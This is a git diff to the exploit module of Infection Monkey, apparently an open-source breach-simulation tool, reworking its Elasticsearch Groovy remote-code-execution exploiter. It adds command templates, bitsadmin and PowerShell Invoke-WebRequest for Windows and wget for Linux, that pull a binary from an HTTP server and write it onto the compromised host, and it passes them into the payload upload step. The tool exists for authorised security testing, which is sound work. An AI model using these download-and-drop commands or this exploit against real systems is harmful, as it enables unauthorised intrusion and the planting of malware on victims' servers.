diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 668a95ce3..51531957b 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -6,13 +6,14 @@ import json import logging - import requests - -from model import DROPPER_ARG from network.elasticfinger import ES_SERVICE, ES_PORT from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from exploit.web_rce import WebRCE +from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED + +import copy +import re __author__ = 'danielg' @@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE): DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder + # Both commands are prepared for use in future development + RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): @@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE): if not vulnerable_urls: return False - if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): + # Extra escaping required: + config = copy.deepcopy(self._config) + config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe" + config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe" + + if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): return False - data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) + commands = {'windows': self.RDP_CMDLINE_HTTP, + 'linux': WGET_HTTP_UPLOAD} + + data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands) # We can't use 'if not' because response may be '' if data is not False and data['response'] == False: @@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE): payload = self.JAVA_CMD % command response = requests.get(url, data=payload) result = self.get_results(response) - if not result: # not vulnerable + if not result: return False return result[0]